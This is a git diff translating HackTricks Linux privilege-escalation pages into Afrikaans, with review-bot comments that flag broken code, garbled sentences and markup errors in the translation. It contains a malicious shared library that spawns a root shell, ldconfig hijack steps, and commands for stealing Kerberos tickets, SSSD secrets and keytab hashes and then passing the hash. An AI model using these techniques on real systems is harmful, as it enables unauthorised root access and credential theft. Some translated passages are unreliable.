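Review bot: The ld.so.conf-example hunk `@@ -25,65 +25,90 @@` inserts invented code that breaks the walkthrough. The added `libcustom.h` block declares `print_message` and `add_numbers`, and the added `libcustom.c` block defines `custom_function()`; neither declares or defines `vuln_func`, which `sharedvuln.c` calls, so a reader who copies the new tab contents gets an undefined reference to `vuln_func` at link time. The original header (`void vuln_func();`) and source (`puts("Hi");`) are still in the hunk but now sit outside any tab. The GitBook tab markup is also unbalanced after this change: the two `-{% endtab %}` lines after the sharedvuln.c and libcustom.h blocks are removed, `+{% endtab %}` is inserted before the original code blocks, and a nested `+{% tabs %}` / `+{% tab title="Afrikaans" %}` now wraps the numbered steps and the "Kontroleer die omgewing" section, with only the original `{% endtabs %}` closing it, which leaves four `{% tab %}` opens against three closes and two `{% tabs %}` against one `{% endtabs %}`. Finally, the hunk strips the indentation of the C function bodies and of the `ldd` output (`- printf("Welcome ...` becomes `+printf("Welcome ...`), which is unrelated to translation. Suggest reverting to the original three tabs with their original code, translating only the prose, and keeping the step list and "Check the environment" section outside the tabs as before.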
@@ -92,91 +117,82 @@ The vulnerable folder is _/home/ubuntu/lib_ (where we have writable access).\ #include void vuln_func(){ - setuid(0); - setgid(0); - printf("I'm the bad library\n"); - system("/bin/sh",NULL,NULL); +setuid(0); +setgid(0); +printf("I'm the bad library\n"); +system("/bin/sh",NULL,NULL); } ``` +Nou dat ons die kwaadwillige libcustom-biblioteek binne die verkeerd gekonfigureerde pad geskep het, moet ons wag vir 'n herlaai of vir die root-gebruiker om `ldconfig` uit te voer (as jy hierdie binêre lêer as `sudo` kan uitvoer of as dit die `suid-bit` het, sal jy dit self kan uitvoer). -Now that we have **created the malicious libcustom library inside the misconfigured** path, we need to wait for a **reboot** or for the root user to execute **`ldconfig`** (_in case you can execute this binary as **sudo** or it has the **suid bit** you will be able to execute it yourself_). - -Once this has happened **recheck** where is the `sharevuln` executable loading the `libcustom.so` library from: - +Sodra dit gebeur het, **herkontroleer** waar die `sharevuln` uitvoerbare lêer die `libcustom.so`-biblioteek laai vanaf: ```c $ldd sharedvuln - linux-vdso.so.1 => (0x00007ffeee766000) - libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000) - /lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000) +linux-vdso.so.1 => (0x00007ffeee766000) +libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000) +/lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000) ``` - -As you can see it's **loading it from `/home/ubuntu/lib`** and if any user executes it, a shell will be executed: - +Soos u kan sien, laai dit dit vanaf `/home/ubuntu/lib` en as enige gebruiker dit uitvoer, sal 'n skulp uitgevoer word: ```c -$ ./sharedvuln +$ ./sharedvuln Welcome to my amazing application! 
I'm the bad library $ whoami ubuntu ``` - {% hint style="info" %} -Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges. +Let wel dat ons in hierdie voorbeeld nie voorregte verhoog het nie, maar deur die opdragte wat uitgevoer word te wysig en **te wag vir die root- of ander bevoorregte gebruiker om die kwesbare binêre lêer uit te voer**, sal ons in staat wees om voorregte te verhoog. {% endhint %} -### Other misconfigurations - Same vuln +### Ander verkeerde konfigurasies - Dieselfde kwesbaarheid -In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.\ -But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it. +In die vorige voorbeeld het ons 'n verkeerde konfigurasie vervals waar 'n administrateur **'n nie-bevoorregte vouer binne 'n konfigurasie-lêer binne `/etc/ld.so.conf.d/`** ingestel het.\ +Maar daar is ander verkeerde konfigurasies wat dieselfde kwesbaarheid kan veroorsaak, as jy **skryfregte** het in 'n **konfigurasie-lêer** binne `/etc/ld.so.conf.d`, in die vouer `/etc/ld.so.conf.d` of in die lêer `/etc/ld.so.conf`, kan jy dieselfde kwesbaarheid konfigureer en uitbuit. 
-## Exploit 2 - -**Suppose you have sudo privileges over `ldconfig`**.\ -You can indicate `ldconfig` **where to load the conf files from**, so we can take advantage of it to make `ldconfig` load arbitrary folders.\ -So, lets create the files and folders needed to load "/tmp": +## Uitbuiting 2 +**Stel dat jy sudo-voorregte het oor `ldconfig`**.\ +Jy kan `ldconfig` aandui **waar om die konf-lêers vanaf te laai**, sodat ons dit kan benut om `ldconfig` willekeurige vouers te laat laai.\ +So, laat ons die lêers en vouers skep wat nodig is om "/tmp" te laai: ```bash cd /tmp echo "include /tmp/conf/*" > fake.ld.so.conf echo "/tmp" > conf/evil.conf ``` - -Now, as indicated in the **previous exploit**, **create the malicious library inside `/tmp`**.\ -And finally, lets load the path and check where is the binary loading the library from: - +Nou, soos aangedui in die **vorige uitbuit**, **skep die skadelike biblioteek binne `/tmp`**.\ +En uiteindelik, laai die pad en kyk waar die binêre lading die biblioteek vandaan: ```bash ldconfig -f fake.ld.so.conf ldd sharedvuln - linux-vdso.so.1 => (0x00007fffa2dde000) - libcustom.so => /tmp/libcustom.so (0x00007fcb07756000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000) - /lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000) +linux-vdso.so.1 => (0x00007fffa2dde000) +libcustom.so => /tmp/libcustom.so (0x00007fcb07756000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000) +/lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000) ``` - -**As you can see, having sudo privileges over `ldconfig` you can exploit the same vulnerability.** +**Soos u kan sien, kan u dieselfde kwesbaarheid uitbuit deur sudo-voorregte oor `ldconfig` te hê.** {% hint style="info" %} -I **didn't find** a reliable way to exploit this vuln if `ldconfig` is configured with the **suid bit**. 
The following error appear: `/sbin/ldconfig.real: Can't create temporary cache file /etc/ld.so.cache~: Permission denied` +Ek **het nie** 'n betroubare manier gevind om hierdie kwesbaarheid uit te buit as `ldconfig` gekonfigureer is met die **suid-bit**. Die volgende fout verskyn: `/sbin/ldconfig.real: Kan nie tydelike kaslêer /etc/ld.so.cache~ skep nie: Toestemming geweier` {% endhint %} -## References +## Verwysings * [https://www.boiteaklou.fr/Abusing-Shared-Libraries.html](https://www.boiteaklou.fr/Abusing-Shared-Libraries.html) * [https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2](https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2) -* Dab machine in HTB +* Dab-masjien in HTB
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As u u **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel u haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
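Review bot: In hunk `@@ -92,91 +117,82 @@` the info hint translates a literal error message: `/sbin/ldconfig.real: Kan nie tydelike kaslêer /etc/ld.so.cache~ skep nie: Toestemming geweier`. The message the reader will actually see is the English one, so keep `Can't create temporary cache file /etc/ld.so.cache~: Permission denied` verbatim and translate only the sentence around it. The sentence `+En uiteindelik, laai die pad en kyk waar die binêre lading die biblioteek vandaan:` is garbled and does not say what the original does (load the path and check where the binary is loading the library from); suggest something like `En laastens, laai die pad en kyk waar die binêre lêer die biblioteek vandaan laai:`. As in the previous hunk, the indentation of the `vuln_func` body and of both `ldd` listings is stripped (`- setuid(0);` becomes `+setuid(0);`), which should be left as it was.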
diff --git a/linux-hardening/privilege-escalation/linux-active-directory.md b/linux-hardening/privilege-escalation/linux-active-directory.md index 15d5b74fa..a114a6605 100644 --- a/linux-hardening/privilege-escalation/linux-active-directory.md +++ b/linux-hardening/privilege-escalation/linux-active-directory.md @@ -1,28 +1,28 @@ -# Linux Active Directory +# Linux Aktiewe Gids
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-A linux machine can also be present inside an Active Directory environment. +'n Linux-rekenaar kan ook binne 'n Aktiewe Gids-omgewing teenwoordig wees. -A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine. +'n Linux-rekenaar in 'n AD kan **verskillende CCACHE-kaartjies binne lêers stoor. Hierdie kaartjies kan gebruik en misbruik word soos enige ander kerberos-kaartjie**. Om hierdie kaartjies te lees, moet jy die eienaar van die kaartjie of **root** binne die rekenaar wees. -## Enumeration +## Enumerasie -### AD enumeration from linux +### AD enumerasie vanaf Linux -If you have access over an AD in linux (or bash in Windows) you can try [https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn) to enumerate the AD. +As jy toegang het tot 'n AD in Linux (of bash in Windows), kan jy [https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn) probeer om die AD te enumereer. -You can also check the following page to learn **other ways to enumerate AD from linux**: +Jy kan ook die volgende bladsy raadpleeg om **ander maniere om AD vanaf Linux te enumereer** te leer: {% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %} [pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md) 
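Review bot: In the linux-active-directory hunk `@@ -1,28 +1,28 @@`, the product name Active Directory is translated: `+# Linux Aktiewe Gids` and `+'n Linux-rekenaar kan ook binne 'n Aktiewe Gids-omgewing teenwoordig wees.` Active Directory is a Microsoft product name, the same hunk keeps the abbreviation `AD` untranslated, and the cross-referenced pages use the English name, so keep "Active Directory" in the title and body.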
@@ -30,28 +30,27 @@ You can also check the following page to learn **other ways to enumerate AD from ### FreeIPA -FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes. Learn more about it in: +FreeIPA is 'n oopbron **alternatief** vir Microsoft Windows **Aktiewe Gids**, hoofsaaklik vir **Unix**-omgewings. Dit kombineer 'n volledige **LDAP-gids** met 'n MIT **Kerberos** Sleutelverspreidingsentrum vir bestuur soortgelyk aan Aktiewe Gids. Deur gebruik te maak van die Dogtag **Sertifikaatstelsel** vir CA & RA sertifikaatbestuur, ondersteun dit **multi-faktor**-verifikasie, insluitend slimkaarte. SSSD is geïntegreer vir Unix-verifikasieprosesse. 
Lees meer daaroor in: {% content-ref url="../freeipa-pentesting.md" %} [freeipa-pentesting.md](../freeipa-pentesting.md) {% endcontent-ref %} -## Playing with tickets +## Speel met kaartjies ### Pass The Ticket -In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack: +Op hierdie bladsy sal jy verskillende plekke vind waar jy **kerberos-kaartjies binne 'n Linux-gashouer kan vind**, op die volgende bladsy kan jy leer hoe om hierdie CCache-kaartjie-formate na Kirbi te omskep (die formaat wat jy in Windows moet gebruik) en ook hoe om 'n PTT-aanval uit te voer: {% content-ref url="../../windows-hardening/active-directory-methodology/pass-the-ticket.md" %} [pass-the-ticket.md](../../windows-hardening/active-directory-methodology/pass-the-ticket.md) {% endcontent-ref %} -### CCACHE ticket reuse from /tmp +### CCACHE-kaartjie-hergebruik vanaf /tmp -CCACHE files are binary formats for **storing Kerberos credentials** are typically stored with 600 permissions in `/tmp`. These files can be identified by their **name format, `krb5cc_%{uid}`,** correlating to the user's UID. For authentication ticket verification, the **environment variable `KRB5CCNAME`** should be set to the path of the desired ticket file, enabling its reuse. - -List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be **reused by setting the environment variable** with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID. +CCACHE-lêers is binêre formate vir **stoor van Kerberos-legitimasie** word tipies gestoor met 600-permissies in `/tmp`. Hierdie lêers kan geïdentifiseer word deur hul **naamformaat, `krb5cc_%{uid}`,** wat ooreenstem met die gebruiker se UID. 
Vir verifikasie van die legitieme kaartjie moet die **omgewingsveranderlike `KRB5CCNAME`** ingestel word op die pad van die gewenste kaartjielêer, sodat dit hergebruik kan word. +Lys die huidige kaartjie wat vir legitimasie gebruik word met `env | grep KRB5CCNAME`. Die formaat is draagbaar en die kaartjie kan **hergebruik word deur die omgewingsveranderlike** in te stel met `export KRB5CCNAME=/tmp/ticket.ccache`. Die naamformaat van die Kerberos-kaartjie is `krb5cc_%{uid}` waar uid die gebruiker se UID is. ```bash # Find tickets ls /tmp/ | grep krb5cc 
@@ -60,87 +59,72 @@ krb5cc_1000 # Prepare to use it export KRB5CCNAME=/tmp/krb5cc_1000 ``` +### CCACHE-kaartjies hergebruik van sleutelring -### CCACHE ticket reuse from keyring - -**Kerberos tickets stored in a process's memory can be extracted**, particularly when the machine's ptrace protection is disabled (`/proc/sys/kernel/yama/ptrace_scope`). A useful tool for this purpose is found at [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey), which facilitates the extraction by injecting into sessions and dumping tickets into `/tmp`. - -To configure and use this tool, the steps below are followed: +**Kerberos-kaartjies wat in die geheue van 'n proses gestoor word, kan onttrek word**, veral wanneer die ptrace-beskerming van die masjien gedeaktiveer is (`/proc/sys/kernel/yama/ptrace_scope`). 'n Nuttige instrument vir hierdie doel is beskikbaar by [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey), wat die onttrekking fasiliteer deur in sessies in te spuit en kaartjies na `/tmp` te dump. +Om hierdie instrument te konfigureer en te gebruik, word die volgende stappe gevolg: ```bash git clone https://github.com/TarlogicSecurity/tickey cd tickey/tickey make CONF=Release /tmp/tickey -i ``` - -This procedure will attempt to inject into various sessions, indicating success by storing extracted tickets in `/tmp` with a naming convention of `__krb_UID.ccache`. +Hierdie prosedure sal probeer om in verskeie sessies in te spuit, sukses aandui deur geëkstraeerde kaartjies in `/tmp` te stoor met 'n naamkonvensie van `__krb_UID.ccache`. -### CCACHE ticket reuse from SSSD KCM +### CCACHE-kaartjiehergebruik vanaf SSSD KCM -SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions. 
- -Invoking \*\*`SSSDKCMExtractor` \*\* with the --database and --key parameters will parse the database and **decrypt the secrets**. +SSSD onderhou 'n kopie van die databasis by die pad `/var/lib/sss/secrets/secrets.ldb`. Die ooreenstemmende sleutel word gestoor as 'n verborge lêer by die pad `/var/lib/sss/secrets/.secrets.mkey`. Standaard is die sleutel slegs leesbaar as jy **root**-regte het. +Deur \*\*`SSSDKCMExtractor` \*\* aan te roep met die --database en --key parameters, sal die databasis geanaliseer word en die geheime **ontsleutel**. ```bash git clone https://github.com/fireeye/SSSDKCMExtractor python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey ``` +Die **kerberos-blob van die geloofsbewaarplek kan omskep word in 'n bruikbare Kerberos CCache-lêer** wat aan Mimikatz/Rubeus oorgedra kan word. -The **credential cache Kerberos blob can be converted into a usable Kerberos CCache** file that can be passed to Mimikatz/Rubeus. - -### CCACHE ticket reuse from keytab - +### Hergebruik van CCACHE-kaartjie vanaf sleuteltabel ```bash git clone https://github.com/its-a-feature/KeytabParser python KeytabParser.py /etc/krb5.keytab klist -k /etc/krb5.keytab ``` +### Haal rekeninge uit /etc/krb5.keytab -### Extract accounts from /etc/krb5.keytab - -Service account keys, essential for services operating with root privileges, are securely stored in **`/etc/krb5.keytab`** files. These keys, akin to passwords for services, demand strict confidentiality. - -To inspect the keytab file's contents, **`klist`** can be employed. The tool is designed to display key details, including the **NT Hash** for user authentication, particularly when the key type is identified as 23. +Diensrekening sleutels, noodsaaklik vir dienste wat met root-voorregte werk, word veilig gestoor in **`/etc/krb5.keytab`** lêers. Hierdie sleutels, soortgelyk aan wagwoorde vir dienste, vereis streng vertroulikheid. 
+Om die inhoud van die keytab-lêer te ondersoek, kan **`klist`** gebruik word. Die instrument is ontwerp om sleutelbesonderhede te vertoon, insluitend die **NT Hash** vir gebruikersverifikasie, veral wanneer die sleutel tipe as 23 geïdentifiseer word. ```bash klist.exe -t -K -e -k FILE:C:/Path/to/your/krb5.keytab # Output includes service principal details and the NT Hash ``` - -For Linux users, **`KeyTabExtract`** offers functionality to extract the RC4 HMAC hash, which can be leveraged for NTLM hash reuse. - +Vir Linux-gebruikers bied **`KeyTabExtract`** funksionaliteit om die RC4 HMAC-hash uit te trek, wat gebruik kan word vir hergebruik van NTLM-hash. ```bash -python3 keytabextract.py krb5.keytab +python3 keytabextract.py krb5.keytab # Expected output varies based on hash availability ``` - -On macOS, **`bifrost`** serves as a tool for keytab file analysis. - +Op macOS dien **`bifrost`** as 'n instrument vir die analise van keytab-lêers. ```bash ./bifrost -action dump -source keytab -path /path/to/your/file ``` - -Utilizing the extracted account and hash information, connections to servers can be established using tools like **`crackmapexec`**. - +Deur gebruik te maak van die onttrekte rekening- en hasinligting, kan verbinding met bedieners tot stand gebring word deur middel van gereedskap soos **`crackmapexec`**. ```bash crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDOMAIN" ``` - -## References +## Verwysings * [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) * [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey) * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
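Review bot: "Active Directory" is a product name and should stay untranslated, but the opening hunk renders it as "Aktiewe Gids" (`+'n Linux-rekenaar kan ook binne 'n Aktiewe Gids-omgewing teenwoordig wees.`) and the `@@ -30` hunk does the same in the FreeIPA paragraph, while the abbreviation "AD" right beside it is left as-is; keep "Active Directory" everywhere so readers can match it to the tooling and the linked pages.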
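Review bot: the meaning of "For authentication ticket verification" is lost in the `@@ -30` hunk, where `+Vir verifikasie van die legitieme kaartjie` reads as "for verification of the legitimate ticket"; "Vir verifikasie met 'n kaartjie" keeps the sense. The same paragraph copies the source's broken grammar (`CCACHE-lêers is binêre formate vir **stoor van Kerberos-legitimasie** word tipies gestoor`), which a translation is the natural place to repair, e.g. "CCACHE-lêers is binêre lêers wat Kerberos-legitimasie stoor en word tipies met 600-permissies in `/tmp` bewaar".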
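Review bot: the `@@ -60` hunk translates format names inconsistently: "credential cache" becomes "geloofsbewaarplek" (a repository of beliefs), "keytab" becomes "sleuteltabel" in the `### Hergebruik van CCACHE-kaartjie vanaf sleuteltabel` heading, and the very next heading keeps "keytab-lêer". Use the untranslated `keytab` and "credential cache (CCACHE)" throughout, since those are the names that appear in the commands below. The hunk also carries the escaped bold markers around `SSSDKCMExtractor` (`\*\*` on both sides) over verbatim instead of fixing them to plain `**`, changes the `python3 keytabextract.py krb5.keytab` line inside a code block by trailing whitespace only, and deletes every blank line between a paragraph and the code fence that follows it; a translation patch should leave layout and code untouched so the diff shows only the text that actually changed.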
diff --git a/linux-hardening/privilege-escalation/linux-capabilities.md b/linux-hardening/privilege-escalation/linux-capabilities.md index 0c13b6978..4596855d6 100644 --- a/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/linux-hardening/privilege-escalation/linux-capabilities.md @@ -1,98 +1,93 @@ -# Linux Capabilities +# Linux-vermoëns
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\\ +​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.\\ {% embed url="https://www.rootedcon.com/" %} -## Linux Capabilities +## Linux-vermoëns -Linux capabilities divide **root privileges into smaller, distinct units**, allowing processes to have a subset of privileges. This minimizes the risks by not granting full root privileges unnecessarily. +Linux-vermoëns verdeel **root-voorregte in kleiner, onderskeibare eenhede**, wat prosesse in staat stel om 'n subset van vermoëns te hê. Dit verminder die risiko deur nie onnodige volle root-voorregte toe te ken nie. -### The Problem: -- Normal users have limited permissions, affecting tasks like opening a network socket which requires root access. +### Die Probleem: +- Normale gebruikers het beperkte toestemmings, wat take soos die oopmaak van 'n netwerksocket wat root-toegang vereis, beïnvloed. -### Capability Sets: +### Vermoënskoppelvlakke: -1. **Inherited (CapInh)**: - - **Purpose**: Determines the capabilities passed down from the parent process. - - **Functionality**: When a new process is created, it inherits the capabilities from its parent in this set. Useful for maintaining certain privileges across process spawns. - - **Restrictions**: A process cannot gain capabilities that its parent did not possess. +1. **Geërf (CapInh)**: +- **Doel**: Bepaal die vermoëns wat van die ouerproses oorgedra word. 
+- **Funksionaliteit**: Wanneer 'n nuwe proses geskep word, erf dit die vermoëns van sy ouer in hierdie stel. Dit is nuttig om sekere voorregte oor prosesverwekings te handhaaf. +- **Beperkings**: 'n Proses kan nie vermoëns verkry wat sy ouer nie besit het nie. -2. **Effective (CapEff)**: - - **Purpose**: Represents the actual capabilities a process is utilizing at any moment. - - **Functionality**: It's the set of capabilities checked by the kernel to grant permission for various operations. For files, this set can be a flag indicating if the file's permitted capabilities are to be considered effective. - - **Significance**: The effective set is crucial for immediate privilege checks, acting as the active set of capabilities a process can use. +2. **Effektief (CapEff)**: +- **Doel**: Verteenwoordig die werklike vermoëns wat 'n proses op enige oomblik gebruik. +- **Funksionaliteit**: Dit is die stel vermoëns wat deur die kern nagegaan word om toestemming vir verskeie operasies te verleen. Vir lêers kan hierdie stel 'n vlag wees wat aandui of die toegelate vermoëns van die lêer as effektief beskou moet word. +- **Betrokkenheid**: Die effektiewe stel is van kritieke belang vir onmiddellike voorregnagaan, en tree op as die aktiewe stel vermoëns wat 'n proses kan gebruik. -3. **Permitted (CapPrm)**: - - **Purpose**: Defines the maximum set of capabilities a process can possess. - - **Functionality**: A process can elevate a 